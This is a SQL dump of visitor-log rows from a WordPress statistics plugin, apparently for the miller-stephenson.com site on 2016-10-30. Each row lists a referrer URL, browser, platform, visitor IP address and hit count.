INSERT INTO `wp_statistics_visitor` VALUES (13658, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '208.86.156.249', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13659, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '129.121.186.211', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13660, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '195.74.38.63', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13661, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '136.243.160.68', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13662, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '217.70.180.226', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13663, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '182.160.157.23', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13664, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '31.186.175.46', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13665, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '192.241.200.77', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13666, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '89.221.250.10', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13667, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '174.136.12.165', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13668, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '77.222.61.19', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13669, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '94.23.248.69', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13670, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '78.46.44.98', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13671, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '89.221.250.20', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13672, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '66.33.193.133', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13673, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '185.85.189.252', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13674, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '37.61.238.4', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13675, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '173.254.66.33', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13676, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '198.1.118.172', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13677, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '144.76.151.130', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13678, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '208.113.181.95', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13679, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '202.174.34.220', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13680, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '213.165.84.241', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13681, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '178.33.89.137', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13682, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '51.255.21.249', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13683, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '50.6.77.89', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13684, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '52.36.222.56', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13685, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '111.235.137.123', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13686, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.30', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13687, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '104.223.9.35', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13688, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '159.203.32.70', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13689, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '148.251.46.104', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13690, '2016-10-30', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '31.196.205.246', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13691, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '217.145.98.111', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13692, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '78.46.4.141', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13693, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '198.11.211.194', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13694, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '195.74.38.149', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13695, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '129.121.176.189', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13696, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '96.126.112.141', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13697, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '185.2.4.14', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13698, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '27.254.52.189', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13699, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '188.65.181.217', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13700, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '174.136.13.224', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13701, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '75.103.66.18', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13702, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '37.187.133.52', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13703, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '174.136.15.243', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13704, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '203.170.85.6', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13705, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '92.53.96.137', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13706, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '62.219.11.42', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13707, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '94.100.11.90', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13708, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '208.109.54.194', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13709, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '81.0.120.62', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13710, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '207.210.203.172', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13711, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '66.33.194.47', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13712, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '37.122.210.254', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13713, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '154.0.162.137', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13714, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '54.172.194.153', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13715, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '198.24.154.187', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13716, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '64.38.249.88', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13717, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '205.234.243.218', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13718, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '153.122.65.166', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13719, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '81.27.99.100', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13720, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '64.111.111.0', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13721, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '66.33.193.222', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13722, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '216.245.201.254', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13723, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '158.58.169.55', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13724, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '205.251.152.3', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13725, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '195.74.38.96', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13726, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '104.131.125.186', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13727, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '78.47.148.75', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13728, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '192.99.62.51', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13729, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '149.202.77.115', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13730, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '149.202.115.202', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13731, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '133.18.4.197', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13732, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '148.251.242.252', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13733, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '75.119.212.213', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13734, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '192.196.156.77', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13735, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '8.14.136.26', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13736, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '88.198.11.200', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13737, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '70.32.80.115', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13738, '2016-10-30', 'https://ttsgco.blogfa.com/', 'Chrome', 'Windows', '49.0.2623.112', '', '151.243.106.191', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13739, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '40.0.2214.115', '', '213.136.78.49', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13740, '2016-10-30', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '194.225.169.8', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13741, '2016-10-30', 'https://ttsgco.blogfa.com/', 'Firefox', 'Windows', '50.0', '', '91.99.40.183', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13742, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.143', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13743, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.91', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13744, '2016-10-30', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '141.248.197.91', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13745, '2016-10-30', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '80.237.93.97', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13746, '2016-10-30', 'https://parlament.biz/', 'Opera', 'Windows', '8.01', '', '176.8.88.141', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13747, '2016-10-30', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '92.66.96.163', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13748, '2016-10-30', 'https://mmr.mschem.com/miller/pdf/Heloxy.pdf', 'Chrome', 'Windows', '54.0.2840.71', '', '109.64.187.114', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13749, '2016-10-30', 'https://www.miller-stephenson.com', 'MSIE', 'Unknown', '9.0', '', '199.185.0.164', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13750, '2016-10-30', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '14.14393', '', '109.226.21.241', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13751, '2016-10-30', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '158.69.237.99', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13752, '2016-10-30', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '24.158.134.58', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13753, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.199', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13754, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.171', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13755, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '38.0.2125.102', '', '194.146.149.42', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13756, '2016-10-30', 'https://www.google.ro/', 'Chrome', 'Windows', '54.0.2840.71', '', '5.13.30.157', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13757, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '115.115.183.198', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13758, '2016-10-30', 'https://www.miller-stephenson.com/product/aeroduster-ms-222n/', 'Chrome', 'Windows', '54.0.2840.71', '', '115.119.115.234', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13759, '2016-10-30', 'https://www.miller-stephenson.com', 'solfo-linkchecker', 'Unknown', '1.0', '', '199.15.176.242', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13760, '2016-10-30', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '62.2.184.122', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13761, '2016-10-30', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '60.52.125.164', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13762, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.120', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13763, '2016-10-30', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '75.136.108.137', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13764, '2016-10-30', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '35.160.93.105', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13765, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '125.209.235.168', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13766, '2016-10-30', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '2.102.68.180', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13767, '2016-10-30', 'https://www.google.com/', 'Safari', 'Macintosh', '9.1.3', '', '107.136.51.103', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13768, '2016-10-30', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '8.0', '', '62.24.181.134', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13769, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.69', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13770, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.61', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13771, '2016-10-30', 'https://ttsgco.blogfa.com/', 'Firefox', 'Android', '40.0', '', '5.122.110.68', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13772, '2016-10-30', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '5.44.124.34', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13773, '2016-10-30', 'https://www.miller-stephenson.com/krytox/?print=y', 'MSIE', 'Windows', '9.0', '', '182.118.20.172', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13774, '2016-10-30', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '212.36.28.149', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13775, '2016-10-30', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.8.0', '', '213.127.45.166', '000', 54, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13776, '2016-10-30', 'https://www.google.co.kr/', 'Chrome', 'Windows', '54.0.2840.71', '', '121.137.103.220', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13777, '2016-10-30', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjuj4bE04LQAhWClX4KHS3rBLcYABAA&sig=AOD64_0tii-bXlyCeI5I4VMpYTbAzI1hew&rct=j&q=&ved=0ahUKEwjzpYLE04LQAhXo3YMKHcxWDkoQ0QwINw&adurl=', 'MSIE', 'Windows', '11.0', '', '208.65.237.34', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13778, '2016-10-30', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.7.0', '', '64.145.94.86', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13779, '2016-10-30', 'https://www.miller-stephenson.com', 'Firefox', 'Macintosh', '10.0.3', '', '64.145.94.86', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13780, '2016-10-30', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '78.101.110.241', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13781, '2016-10-30', 'https://www.miller-stephenson.com/products/detail.aspx?ItemId=57', 'MSIE', 'Windows', '9.0', '', '182.118.22.229', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13782, '2016-10-30', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '7.0', '', '131.253.27.95', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13783, '2016-10-30', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '7.0', '', '131.253.25.207', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13784, '2016-10-30', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '7.0', '', '131.253.25.176', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13785, '2016-10-30', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.200.185.85', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13786, '2016-10-30', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '80.98.95.4', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13787, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '49.0.2623.112', '', '41.33.248.226', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13788, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.148', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13789, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.180', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13790, '2016-10-30', 'https://www.miller-stephenson.com', 'ZoomBot', 'Unknown', 'Unknown', '', '52.57.203.242', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13791, '2016-10-30', 'https://www.miller-stephenson.com/ptfe-dry-film-lubricants/', 'MSIE', 'Windows', '9.0', '', '182.118.21.214', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13792, '2016-10-30', 'https://www.miller-stephenson.com/', 'Opera Next', 'Windows', '26.0.1656.60', '', '151.237.185.149', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13793, '2016-10-30', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '151.237.185.149', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13794, '2016-10-30', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '71.46.59.40', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13795, '2016-10-30', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '77.93.63.90', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13796, '2016-10-30', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '7.0', '', '118.217.181.182', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13797, '2016-10-30', 'https://voloomoney.com/buy/kupit-gold-wow/', 'MSIE', 'Windows', '5.0', '', '178.137.95.202', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13798, '2016-10-30', 'https://www.google.com/', 'Chrome', 'iPhone', '54.0.2840.66', '', '174.197.19.48', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13799, '2016-10-30', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '195.154.146.225', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13800, '2016-10-30', 'https://www.google.ca', 'Firefox', 'Windows', '47.0', '', '173.230.181.45', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13801, '2016-10-30', 'https://www.google.co.il/url?url=https://www.miller-stephenson.com/&rct=j&frm=1&q=&esrc=s&sa=U&ved=0ahUKEwjbhY3L94LQAhUEXBQKHaURDAgQFggVMAA&usg=AFQjCNHVMV3tSuqMIrrBe8ycLmdO3Xacdw', 'MSIE', 'Windows', '8.0', '', '172.18.2.72', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13802, '2016-10-30', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '9.0', '', '38.132.71.154', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13803, '2016-10-30', 'https://xn--80aaomkdl5amcy.xn--p1ai/', 'MSIE', 'Windows', '6.0', '', '46.119.118.233', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13804, '2016-10-30', 'https://pk-services.ru/', 'MSIE', 'Windows', '5.5', '', '46.119.118.233', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13805, '2016-10-30', 'https://www.miller-stephenson.com', 'MSIE', 'Unknown', '8.0', '', '115.124.122.170', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13806, '2016-10-30', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '9.0.1', '', '100.12.200.54', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13807, '2016-10-30', 'https://1-99seo.com/try.php?u=https://www.miller-stephenson.com', 'Chrome', 'Windows', '35.0.1916.153', '', '93.41.2.137', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13808, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.97', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13809, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.159', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13810, '2016-10-30', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.11', '', '98.177.179.179', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13811, '2016-10-30', 'https://www.google.co.in/', 'Chrome', 'Android', '53.0.2785.124', '', '49.34.163.195', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13812, '2016-10-30', 'https://www.miller-stephenson.com', 'VB', 'Unknown', 'Unknown', '', '115.119.113.194', '000', 1, 0); 
